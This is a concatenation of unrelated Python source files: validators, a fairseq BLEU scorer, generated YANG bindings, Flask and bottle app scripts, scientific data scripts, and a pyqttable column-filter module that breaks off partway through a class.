Validates against range-type then checks the range.
Args:
value: Value to validate.
key: Name of the field being validated.
Raises:
ValidationError: when value is out of range. ValidationError when value
is not of the same range type.
"""
cast_value = self._type_validator.Validate(value, key)
if self.maximum is None and cast_value < self.minimum:
raise ValidationError('Value \'%s\' for %s less than %s'
% (value, key, self.minimum))
elif self.minimum is None and cast_value > self.maximum:
raise ValidationError('Value \'%s\' for %s greater than %s'
% (value, key, self.maximum))
elif ((self.minimum is not None and cast_value < self.minimum) or
(self.maximum is not None and cast_value > self.maximum)):
raise ValidationError('Value \'%s\' for %s is out of range %s - %s'
% (value, key, self.minimum, self.maximum))
return cast_value
class Repeated(Validator):
"""Repeated field validator.
Indicates that attribute is expected to be a repeated value, ie,
a sequence. This adds additional validation over just Type(list)
in that it retains information about what can be stored in the list by
use of its constructor field.
"""
def __init__(self, constructor, default=None):
"""Initializer for repeated field.
Args:
constructor: Type used for verifying elements of sequence attribute.
"""
super(Repeated, self).__init__(default)
self.constructor = constructor
self.expected_type = list
def Validate(self, value, key):
"""Do validation of sequence.
Value must be a list and all elements must be of type 'constructor'.
Args:
value: Value to validate.
key: Name of the field being validated.
Raises:
ValidationError: if value is None, not a list or one of its elements is
the wrong type.
"""
if not isinstance(value, list):
raise ValidationError('Value \'%s\' for %s should be a sequence but '
'is not.' % (value, key))
for item in value:
if isinstance(self.constructor, Validator):
item = self.constructor.Validate(item, key)
elif not isinstance(item, self.constructor):
raise ValidationError('Value element \'%s\' for %s must be type %s.' % (
str(item), key, self.constructor.__name__))
return value
class TimeValue(Validator):
"""Validates time values with units, such as 1h or 3.5d."""
_EXPECTED_SYNTAX = ('must be a non-negative number followed by a time unit, '
'such as 1h or 3.5d')
def __init__(self):
super(TimeValue, self).__init__()
self.expected_type = str
def Validate(self, value, key):
"""Validate a time value.
Args:
value: Value to validate.
key: Name of the field being validated.
Raises:
ValidationError: if value is not a time value with the expected format.
"""
if not isinstance(value, basestring):
raise ValidationError("Value '%s' for %s is not a string (%s)"
% (value, key, TimeValue._EXPECTED_SYNTAX))
if not value:
raise ValidationError("Value for %s is empty (%s)"
% (key, TimeValue._EXPECTED_SYNTAX))
if value[-1] not in "smhd":
raise ValidationError("Value '%s' for %s must end with a time unit, "
"one of s (seconds), m (minutes), h (hours), "
"or d (days)" % (value, key))
try:
t = float(value[:-1])
except ValueError:
raise ValidationError("Value '%s' for %s is not a valid time value (%s)"
% (value, key, TimeValue._EXPECTED_SYNTAX))
if t < 0:
raise ValidationError("Value '%s' for %s is negative (%s)"
% (value, key, TimeValue._EXPECTED_SYNTAX))
return value
|
py | 1a49f1f5ba8130262c73bcca5149ffbcc8cf42fe | from typing import Literal
from pydantic import BaseModel, HttpUrl, PositiveInt, constr
class Observability(BaseModel):
POWERTOOLS_SERVICE_NAME: constr(min_length=1)
LOG_LEVEL: Literal['DEBUG', 'INFO', 'ERROR', 'CRITICAL', 'WARNING', 'EXCEPTION']
class DynamicConfiguration(BaseModel):
CONFIGURATION_APP: constr(min_length=1)
CONFIGURATION_ENV: constr(min_length=1)
CONFIGURATION_NAME: constr(min_length=1)
CONFIGURATION_MAX_AGE_MINUTES: PositiveInt
class MyHandlerEnvVars(Observability, DynamicConfiguration):
REST_API: HttpUrl
ROLE_ARN: constr(min_length=20, max_length=2048)
|
py | 1a49f2f4f413c5efed3dcd3507afc7d6ed57c0e3 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import ctypes
import math
import torch
from fairseq.scoring import register_scoring
try:
from fairseq import libbleu
except ImportError as e:
import sys
sys.stderr.write("ERROR: missing libbleu.so. run `pip install --editable .`\n")
raise e
C = ctypes.cdll.LoadLibrary(libbleu.__file__)
class BleuStat(ctypes.Structure):
_fields_ = [
("reflen", ctypes.c_size_t),
("predlen", ctypes.c_size_t),
("match1", ctypes.c_size_t),
("count1", ctypes.c_size_t),
("match2", ctypes.c_size_t),
("count2", ctypes.c_size_t),
("match3", ctypes.c_size_t),
("count3", ctypes.c_size_t),
("match4", ctypes.c_size_t),
("count4", ctypes.c_size_t),
]
@register_scoring("sacrebleu")
class SacrebleuScorer(object):
def __init__(self, *unused):
import sacrebleu
self.sacrebleu = sacrebleu
self.reset()
def reset(self, one_init=False):
if one_init:
raise NotImplementedError
self.ref = []
self.sys = []
def add_string(self, ref, pred):
self.ref.append(ref)
self.sys.append(pred)
def score(self, order=4):
return self.result_string(order).score
def result_string(self, order=4, tokenize=None):
if order != 4:
raise NotImplementedError
if tokenize:
return self.sacrebleu.corpus_bleu(self.sys, [self.ref], tokenize=tokenize).format()
return self.sacrebleu.corpus_bleu(self.sys, [self.ref]).format()
@register_scoring("bleu")
class Scorer(object):
def __init__(self, pad, eos, unk):
self.stat = BleuStat()
self.pad = pad
self.eos = eos
self.unk = unk
self.reset()
def reset(self, one_init=False):
if one_init:
C.bleu_one_init(ctypes.byref(self.stat))
else:
C.bleu_zero_init(ctypes.byref(self.stat))
def add(self, ref, pred):
if not isinstance(ref, torch.IntTensor):
raise TypeError("ref must be a torch.IntTensor (got {})".format(type(ref)))
if not isinstance(pred, torch.IntTensor):
raise TypeError("pred must be a torch.IntTensor(got {})".format(type(pred)))
# don't match unknown words
rref = ref.clone()
assert not rref.lt(0).any()
rref[rref.eq(self.unk)] = -999
rref = rref.contiguous().view(-1)
pred = pred.contiguous().view(-1)
C.bleu_add(
ctypes.byref(self.stat),
ctypes.c_size_t(rref.size(0)),
ctypes.c_void_p(rref.data_ptr()),
ctypes.c_size_t(pred.size(0)),
ctypes.c_void_p(pred.data_ptr()),
ctypes.c_int(self.pad),
ctypes.c_int(self.eos),
)
def score(self, order=4):
psum = sum(
math.log(p) if p > 0 else float("-Inf") for p in self.precision()[:order]
)
return self.brevity() * math.exp(psum / order) * 100
def precision(self):
def ratio(a, b):
return a / b if b > 0 else 0
return [
ratio(self.stat.match1, self.stat.count1),
ratio(self.stat.match2, self.stat.count2),
ratio(self.stat.match3, self.stat.count3),
ratio(self.stat.match4, self.stat.count4),
]
def brevity(self):
r = self.stat.reflen / self.stat.predlen
return min(1, math.exp(1 - r))
def result_string(self, order=4):
assert order <= 4, "BLEU scores for order > 4 aren't supported"
fmt = "BLEU{} = {:2.2f}, {:2.1f}"
for _ in range(1, order):
fmt += "/{:2.1f}"
fmt += " (BP={:.3f}, ratio={:.3f}, syslen={}, reflen={})"
bleup = [p * 100 for p in self.precision()[:order]]
return fmt.format(
order,
self.score(order=order),
*bleup,
self.brevity(),
self.stat.predlen / self.stat.reflen,
self.stat.predlen,
self.stat.reflen
)
|
py | 1a49f33e13ba0fb7f94474a48fed75f8fb7cfb09 | from typing import Optional
import attr
from .action_abstract_test_summary import ActionAbstractTestSummary
from . import helpers
@attr.s
class ActionTestSummaryIdentifiableObject(ActionAbstractTestSummary):
identifier: Optional[str] = attr.ib()
@classmethod
def convert_identifier_field(cls, report: dict) -> Optional[str]:
return helpers.string_from_report(report.get("identifier"), dict(default=None))
|
py | 1a49f40f82ccd714cbf0bd1901239cfd5d87403f |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import allowed
class trunk_vlan_classification(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-interface - based on the path /interface/gigabitethernet/switchport/trunk/trunk-vlan-classification. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__allowed',)
_yang_name = 'trunk-vlan-classification'
_rest_name = ''
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__allowed = YANGDynClass(base=allowed.allowed, is_container='container', presence=False, yang_name="allowed", rest_name="allowed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set the VLANs that will Xmit/Rx through the Layer2\ninterface', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-interface', defining_module='brocade-interface', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'interface', u'gigabitethernet', u'switchport', u'trunk', u'trunk-vlan-classification']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'interface', u'GigabitEthernet', u'switchport', u'trunk']
def _get_allowed(self):
"""
Getter method for allowed, mapped from YANG variable /interface/gigabitethernet/switchport/trunk/trunk_vlan_classification/allowed (container)
YANG Description: Set the VLANs that will Xmit/Rx through the Layer2
interface
"""
return self.__allowed
def _set_allowed(self, v, load=False):
"""
Setter method for allowed, mapped from YANG variable /interface/gigabitethernet/switchport/trunk/trunk_vlan_classification/allowed (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_allowed is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_allowed() directly.
YANG Description: Set the VLANs that will Xmit/Rx through the Layer2
interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=allowed.allowed, is_container='container', presence=False, yang_name="allowed", rest_name="allowed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set the VLANs that will Xmit/Rx through the Layer2\ninterface', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-interface', defining_module='brocade-interface', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """allowed must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=allowed.allowed, is_container='container', presence=False, yang_name="allowed", rest_name="allowed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set the VLANs that will Xmit/Rx through the Layer2\ninterface', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-interface', defining_module='brocade-interface', yang_type='container', is_config=True)""",
})
self.__allowed = t
if hasattr(self, '_set'):
self._set()
def _unset_allowed(self):
self.__allowed = YANGDynClass(base=allowed.allowed, is_container='container', presence=False, yang_name="allowed", rest_name="allowed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set the VLANs that will Xmit/Rx through the Layer2\ninterface', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-interface', defining_module='brocade-interface', yang_type='container', is_config=True)
allowed = __builtin__.property(_get_allowed, _set_allowed)
_pyangbind_elements = {'allowed': allowed, }
|
py | 1a49f474f7e09d82d81adc1999a11d91ade24e67 | """Binaries"""
from __future__ import print_function
from collections import defaultdict
import sys
def print_table(rows, headers=None, space_between_columns=4):
"""
Convenience method for printing a list of dictionary objects into a table. Automatically sizes the
columns to be the maximum size of any entry in the dictionary, and adds additional buffer whitespace.
Params:
rows - A list of dictionaries representing a table of information, where keys are the
headers of the table. Ex. { 'Name': 'John', 'Age': 23 }
headers - A list of the headers to print for the table. Must be a subset of the keys of
the dictionaries that compose the row. If a header isn't present or it's value
has a falsey value, the value printed is '-'.
space_between_columns - The amount of space between the columns of text. Defaults to 4.
"""
columns_to_sizing = defaultdict(int)
format_string = ''
headers = headers or rows[0].keys()
for row in rows:
for header in headers:
value = row.get(header, '-')
columns_to_sizing[header] = max(len(str(value)), columns_to_sizing[header])
for header in headers:
column_size = max(columns_to_sizing[header], len(header)) + space_between_columns
format_string += '{' + header + ':<' + str(column_size) + '}'
print(format_string.format(**{key: key for key in headers}), file=sys.stderr)
for row in rows:
defaulted_row = {header: row.get(header) or '-' for header in headers}
print(format_string.format(**defaulted_row))
|
py | 1a49f4a9b776aef127b3b8913f29c2fddb49d679 | """
This script runs the application using a development server.
"""
import bottle
import os
import sys
# routes contains the HTTP handlers for our server and must be imported.
import routes
import src.emotion_bottle
if '--debug' in sys.argv[1:] or 'SERVER_DEBUG' in os.environ:
# Debug mode will enable more verbose output in the console window.
# It must be set at the beginning of the script.
bottle.debug(True)
def wsgi_app():
"""Returns the application to make available through wfastcgi. This is used
when the site is published to Microsoft Azure."""
return bottle.default_app()
if __name__ == '__main__':
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static').replace('\\', '/')
HOST = os.environ.get('SERVER_HOST', 'localhost')
try:
PORT = int(os.environ.get('SERVER_PORT', '5555'))
except ValueError:
PORT = 5555
@bottle.route('/static/<filepath:path>')
def server_static(filepath):
"""Handler for static files, used with the development server.
When running under a production server such as IIS or Apache,
the server should be configured to serve the static files."""
return bottle.static_file(filepath, root=STATIC_ROOT)
# Starts a local test server.
bottle.run(server='wsgiref', host=HOST, port=PORT)
|
py | 1a49f5a56218c9022e25776dcd9997782d4f1f23 | import glob
import operator
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns; sns.set()
import scipy
from scipy import ndimage
from sklearn.decomposition import PCA
from sklearn.manifold import MDS
from sklearn.manifold import TSNE
import sys
#run pca
def pca_red(X):
pca = PCA(n_components=1)
pca.fit(X)
print "variance explained by pca"
print pca.explained_variance_ratio_
return pca.transform(X)
#run mds
def mds_red(X):
mds = MDS(n_components=1)
return mds.fit_transform(X)
#run tsne
def tsne_red(X):
tsne = TSNE(n_components=2)
return tsne.fit_transform(X)
#make plots
def scatter_plot(data,labels,outname):
plt.ioff()
fig=plt.figure(figsize=(8,6))
axes=plt.gca()
plt.xticks(fontsize=15)
plt.xlabel("PC1",fontsize=20)
axes.set_yticklabels([])
plt.scatter(data,[0]*len(data),s=70)
for label, x in zip(labels,data):
plt.annotate(label,xy=(x,0),xytext=(-5,5),textcoords='offset points')
plt.savefig(outname)
plt.close()
#print input for the dimensionality reduction
def printmat(indices,faclst,inmat,outname):
outs="#\t"
for ind in indices:
outs=outs+str(ind)+"\t"
outs=outs+"\n"
for i in range(0,len(inmat)):
slist=[str(x) for x in inmat[i]]
outs=outs+faclst[i]+"\t"+"\t".join(slist)+"\n"
with open(outname,'w')as mout:
mout.write(outs)
##############
#main
try:
flistname=sys.argv[1]
except IndexError:
print("please provide path to file list")
pass
flist=[]
with open(flistname) as f:
for line in f:
flist.append(line.rstrip())
all_indices=[]
results={}
for f in flist:
with open(f,'r') as mlf:
firstline=mlf.readline().rstrip().split("\t")
for words in firstline:
if "XL" in words:
ind=words.split(',')[1]
all_indices.append(ind)
tmp_l=list(set(all_indices))
temp_num=sorted([int(x) for x in tmp_l])
indices=[str(x) for x in temp_num]
for f in flist:
factor=f.split(".")[1]
d={} #dictionary contains position mapping to column number
# get column index for positions
with open(f,'r') as mlf:
firstline=mlf.readline().rstrip().split("\t")
for index in indices:
for i in range(0,len(firstline)):
if "XL" in firstline[i]:
currcol=firstline[i].split(',')[1]
if str(index) == currcol:
d[index]=i
xl={}
for index in indices:
xl[index]=0
for line in mlf:
back=line.rstrip().split("\t")[2]
for index in indices:
if index in d:
xl[index]+=float(line.rstrip().split("\t")[d[index]])
else:
xl[index]+=0
results[factor]=xl
faclst=[]
mat=[]
for key in results:
faclst.append(key)
val=results[key]
flst=[]
for i in indices:
flst.append(val[i])
mat.append(flst)
#normalize
nmat=[]
for row in mat:
nrowmat=[]
rowsum=0
for i in row:
rowsum=rowsum+i
for i in row:
nrowmat.append(i/rowsum)
nmat.append(nrowmat)
#print input matrix for dimentionality reduction
#printmat(indices,faclst,mat,'mat.out')
printmat(indices,faclst,nmat,'nmat.out')
#perform dimentionality reduction
x=np.array(nmat)
pca_mat=pca_red(x)
mds_mat=mds_red(x)
tsne_mat=tsne_red(x)
#make plots
scatter_plot(pca_mat,faclst,"pca_test.png")
scatter_plot(mds_mat,faclst,"mds_test.png")
|
py | 1a49f6224fcdd65760cbe10e801bd72bb69fe1fa | """
Module for generating Arc Line lists
Should be run where it is located (for now)
"""
from __future__ import print_function, absolute_import, division, unicode_literals
import os
import pdb
import datetime
from pkg_resources import resource_filename
from collections import OrderedDict
from astropy.table import Table, Column
line_path = resource_filename('pypeit', '/data/arc_lines/lists/')
nist_path = resource_filename('pypeit', '/data/arc_lines/NIST/')
def parser(options=None):
import argparse
# Parse
parsefunc = argparse.ArgumentParser(
description='Build the PypeIt line lists from NIST tables')
parsefunc.add_argument("-w", "--write", default=False, action='store_true', help="Actually write files?")
parsefunc.add_argument("--skip_stop", default=False, action='store_true', help="Skip warning stop?")
parsefunc.add_argument("-r", "--relint", type=float, default=1000.0, help="Set the relative intensity threshold")
parsefunc.add_argument("line", default='', help="Name of ion")
if options is None:
args = parsefunc.parse_args()
else:
args = parsefunc.parse_args(options)
return args
def init_line_list():
""" Initialize a Table for a linelist
Rigidly enforces table column formats
Strings are the most annoying
Returns
-------
init_tbl : Table
One dummy row
"""
dummy_src = str('#')*50
# Arc Line name
dummy_line = str('#')*8
#
# Dict for Table
idict = OrderedDict()
idict['ion'] = dummy_line
idict['wave'] = 0.
idict['NIST'] = 0
idict['Instr'] = 0 # Flag for instrument
idict['amplitude'] = 0
idict['Source'] = dummy_src
# Table
tkeys = idict.keys()
lst = [[idict[tkey]] for tkey in tkeys]
init_tbl = Table(lst, names=tkeys)
# Return
return init_tbl
def load_line_list(line):
"""
Parameters
----------
line : str
Name of ion
Returns
-------
line_list : Table
"""
line_file = nist_path + '{:s}_vacuum.ascii'.format(line)
# Check the NIST lines file exists
if not os.path.isfile(line_file):
raise IOError("Input line {:s} is not available".format(line))
line_list = Table.read(line_file, format='ascii.fixed_width', comment='#')
# Remove unwanted columns
tkeys = line_list.keys()
for badkey in ['Ritz', 'Acc.', 'Type', 'Ei', 'Lower', 'Upper', 'TP', 'Line']:
for tkey in tkeys:
if badkey in tkey:
line_list.remove_column(tkey)
# Relative intensity -- Strip junk off the end
reli = []
for imsk, idat in zip(line_list['Rel.'].mask, line_list['Rel.'].data):
if imsk:
reli.append(0.)
else:
try:
reli.append(float(idat))
except ValueError:
try:
reli.append(float(idat[:-1]))
except ValueError:
reli.append(0.)
line_list.remove_column('Rel.')
line_list['Rel.'] = reli
#
gdrows = line_list['Observed'] > 0. # Eliminate dummy lines
line_list = line_list[gdrows]
line_list.rename_column('Observed', 'wave')
# Others
# Grab ion name
i0 = line_file.rfind('/')
i1 = line_file.rfind('_')
ion = line_file[i0+1:i1]
line_list.add_column(Column([ion]*len(line_list), name='Ion', dtype='U5'))
line_list.add_column(Column([1]*len(line_list), name='NIST'))
return line_list
def main(args=None):
""" This script convert an input NIST table into a line list that can be used by PypeIt
Parameters
----------
args
Returns
-------
"""
# Grab arguments
pargs = parser(options=args)
line = pargs.line
relIntThreshold = pargs.relint
print("=============================================================")
print("This script is for EXPERTS ONLY")
print("Continue only if you know what you are doing")
print("Otherwise exit")
print("p.s. You need to remove the files you wish to re-build")
print("=============================================================")
if not pargs.skip_stop:
pdb.set_trace()
# Load the NIST ThAr list
llist = load_line_list(line)
# ['wave', 'Aki', 'Rel.', 'Ion', 'NIST']
# Generate a table
linelist = init_line_list()
# now add all NIST lines
nlines = llist['Ion'].size
for ll in range(nlines):
if llist['Rel.'][ll] > relIntThreshold:
linelist.add_row([llist['Ion'][ll], llist['wave'][ll], 1, 0, llist['Rel.'][ll], 'NIST'])
if ll+1 % 100 == 0:
print(ll+1, '/', nlines)
# Remove the first dummy row
linelist.remove_row(0)
# Finally, sort the list by increasing wavelength
linelist.sort('wave')
# Write?
if not pargs.write:
print("=============================================================")
print("Rerun with --write if you are happy with what you see.")
print("=============================================================")
return
# Write the table to disk
outfile = line_path + '{:s}_lines.dat'.format(line)
write_line_list(linelist, outfile)
return
def write_line_list(tbl, outfile):
"""
Parameters
----------
tbl
outfile
"""
# Format
tbl['wave'].format = '10.4f'
# Write
with open(outfile, 'w') as f:
f.write('# Creation Date: {:s}\n'.format(str(datetime.date.today().strftime('%Y-%m-%d'))))
tbl.write(f, format='ascii.fixed_width')
if __name__ == '__main__':
main()
|
py | 1a49f81e96b4c485e80ace18a104ccd2fb403f76 | #!/usr/bin/env python
from tools.load import LoadMatrix
import numpy as np
lm=LoadMatrix()
traindat = np.ushort(lm.load_numbers('../data/fm_train_word.dat'))
testdat = np.ushort(lm.load_numbers('../data/fm_test_word.dat'))
parameter_list=[[traindat,testdat,1.2],[traindat,testdat,1.2]]
def kernel_linear_word (fm_train_word=traindat,fm_test_word=testdat,scale=1.2):
import shogun as sg
feats_train=sg.create_features(fm_train_word)
feats_test=sg.create_features(fm_test_word)
kernel=sg.create_kernel("LinearKernel")
kernel.init(feats_train, feats_train)
kernel.set_normalizer(sg.create_kernel_normalizer("AvgDiagKernelNormalizer", scale=scale))
kernel.init(feats_train, feats_train)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return kernel
if __name__=='__main__':
print('LinearWord')
kernel_linear_word(*parameter_list[0])
|
py | 1a49f86e4ba626b34a3363d5c0be3f43e1f4c00d | # -*- coding: utf-8 -*-
#!/usr/bin/env python
''''
wlanのipを探るためのプログラム
'''
import socket
import fcntl
import sys
def ifconfig(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
result = fcntl.ioctl(s.fileno(), 0x8915 ,(ifname+'\0'*32)[:32])
except IOError:
return None
return socket.inet_ntoa(result[20:24])
if __name__ == '__main__':
print (ifconfig(sys.argv[1]))
|
py | 1a49fa2507f2211e6177a8b23df7bc221f828027 | #
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import nltk
from nltk import word_tokenize
import json
import tensorrt as trt
def preprocess(text):
try:
nltk.data.find('tokenizers/punkt')
except LookupError:
nltk.download('punkt')
tokens = word_tokenize(text)
# split into lower-case word tokens, in numpy array with shape of (seq, 1)
words = np.asarray([w.lower() for w in tokens]).reshape(-1, 1)
# split words into chars, in numpy array with shape of (seq, 1, 1, 16)
chars = [[c for c in t][:16] for t in tokens]
chars = [cs+['']*(16-len(cs)) for cs in chars]
chars = np.asarray(chars).reshape(-1, 1, 1, 16)
return words, chars
def get_map_func(filepath):
file = open(filepath)
category_map = json.load(file)
category_mapper = dict(zip(category_map["cats_strings"], category_map["cats_int64s"]))
default_int64 = category_map["default_int64"]
func = lambda s: category_mapper.get(s, default_int64)
return np.vectorize(func)
def get_inputs(context, query):
cw, cc = preprocess(context)
qw, qc = preprocess(query)
context_word_func = get_map_func("CategoryMapper_4.json")
context_char_func = get_map_func("CategoryMapper_5.json")
query_word_func = get_map_func("CategoryMapper_6.json")
query_char_func = get_map_func("CategoryMapper_7.json")
cw_input = context_word_func(cw).astype(trt.nptype(trt.int32)).ravel()
cc_input = context_char_func(cc).astype(trt.nptype(trt.int32)).ravel()
qw_input = query_word_func(qw).astype(trt.nptype(trt.int32)).ravel()
qc_input = query_char_func(qc).astype(trt.nptype(trt.int32)).ravel()
return cw_input, cc_input, qw_input, qc_input
|
py | 1a49faffdd6c0c12660722373166591b71161af3 | import _plotly_utils.basevalidators
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="size", parent_name="scatterternary.marker", **kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", 0),
**kwargs,
)
|
py | 1a49fb2679b31ad6687925cf7268a39071b9e65f | from flask import cli
from flask.cli import FlaskGroup
from lps import create_app, db
from lps.models import *
from lps.seeds import seed_database, export_seed
from lps.mail_utils import send_alert_mail
app = create_app()
cli = FlaskGroup(create_app=create_app)
# DATABASE COMMANDS
@cli.command("seed_db")
def seed_db():
print("======== STARTING DATABASE SEED ========")
seed_database(db)
print("======== SEED COMPLETED ========")
@cli.command("reset_db")
def reset_db():
LocatorPoint.query.delete()
Unit.query.delete()
ApiKey.query.delete()
User.query.delete()
db.session.commit()
print("======== RESET DATABASE ========")
@cli.command("export_db")
def export_db():
print("======== EXPORTING DATABASE SEED ========")
export_seed()
print("======== EXPORT COMPLETED ========")
# MAIL SERVER COMMANDS
@cli.command("test_mail")
def test_mail():
send_alert_mail("")
if __name__ == '__main__':
cli() |
py | 1a49fba92753e7f89d7fc9e8ae9a8f981ef2fcdd | # -*- coding: utf-8 -*-
"""column filter"""
__all__ = ['Filter', 'FilterType']
import abc
import enum
import pandas as pd
import re
from .default import ValueFetcher
from .type import basic_column_type
from pyqttable import const
from typing import List, Optional, Any
class FilterType(enum.Enum):
"""Column filter type"""
Exact = 'exact'
Contain = 'contain'
Regex = 'regex'
Expression = 'expression'
MultipleChoice = 'multiple_choice'
class Filter(metaclass=abc.ABCMeta):
"""
Column filter, including:
- filter type
- filter widget info
- filter function
"""
# Placeholder text for filter widget
PlaceHolderText = ''
def __init__(self, filter_type):
self.type = filter_type
@classmethod
def make(cls, fetcher: ValueFetcher):
"""Make Filter from ValueFetcher"""
filter_type = fetcher.get('filter_type')
# If filter_type is already Filter, just return
if isinstance(filter_type, cls):
return filter_type
# Convert filter_type to enum
try:
filter_type = FilterType(filter_type)
except Exception as e:
_ = e
else:
# Make Filter instance according to FilterType
if filter_type == FilterType.Exact:
return ExactFilter(filter_type)
elif filter_type == FilterType.Contain:
return ContainFilter(filter_type)
elif filter_type == FilterType.Regex:
return RegexFilter(filter_type)
elif filter_type == FilterType.Expression:
return ExpressionFilter(filter_type)
elif filter_type == FilterType.MultipleChoice:
return MultipleChoice(filter_type)
# If FilterType is invalid, raise error
raise TypeError(f'invalid filter type \'{filter_type}\'')
def filter(self, df: pd.DataFrame, by: str, filter_value: Any,
to_string: Optional[callable] = None,
to_value: Optional[callable] = None) -> pd.DataFrame:
"""
Filter DataFrame
Parameters
----------
df: input DataFrame to be filtered
by: column key to do filtering
filter_value: current value passed by filter widget
to_string: function to convert data from original format to string
to_value: function to convert data from string to original format
Returns
-------
Filtered DataFrame
"""
kwargs = dict(filter_value=filter_value, to_string=to_string, to_value=to_value)
return df[df[by].apply(self._filter_apply, **kwargs)].copy()
def _filter_apply(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if self.common_filter(content, filter_value):
return True
try:
return self.filter_each(content, filter_value, to_string, to_value)
except Exception as e:
_ = e
return False
@staticmethod
def common_filter(content: Any, filter_value: Any) -> bool:
"""Common filter for all kinds of Filters"""
if isinstance(filter_value, str):
if filter_value == '#blank':
return False if content else True
elif filter_value == '#non-blank':
return True if content else False
return False
@abc.abstractmethod
def filter_each(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
"""
Method to filter each value
Parameters
----------
content: cell data to be filtered
filter_value: current value passed by filter widget
to_string: function to convert data from original format to string
to_value: function to convert data from string to original format
Returns
-------
Remain in result or not
"""
...
class ExactFilter(Filter):
"""Perfect match filter"""
PlaceHolderText = 'Exact'
def filter_each(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if isinstance(filter_value, str):
return to_string(content) == filter_value
else:
return content == filter_value
class ContainFilter(Filter):
"""Contain filter"""
PlaceHolderText = 'Contain'
def filter_each(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if isinstance(filter_value, str):
return to_string(content).find(filter_value) > -1
else:
return False
class RegexFilter(Filter):
"""Filtered by regex expression"""
PlaceHolderText = 'Regex'
def filter_each(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if isinstance(filter_value, str):
return True if re.findall(filter_value, to_string(content)) else False
else:
return False
class ExpressionFilter(Filter):
"""Filtered by python expression"""
PlaceHolderText = 'Express'
def filter_each(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if isinstance(filter_value, str):
if not isinstance(content, tuple(basic_column_type)):
content = to_string(content)
expression = f'{content!r} {filter_value}'
try:
res = eval(expression)
except Exception as e:
_ = e
return False
else:
return False if res is False else True
else:
return False
class MultipleChoice(Filter):
"""Filter with multiple choices"""
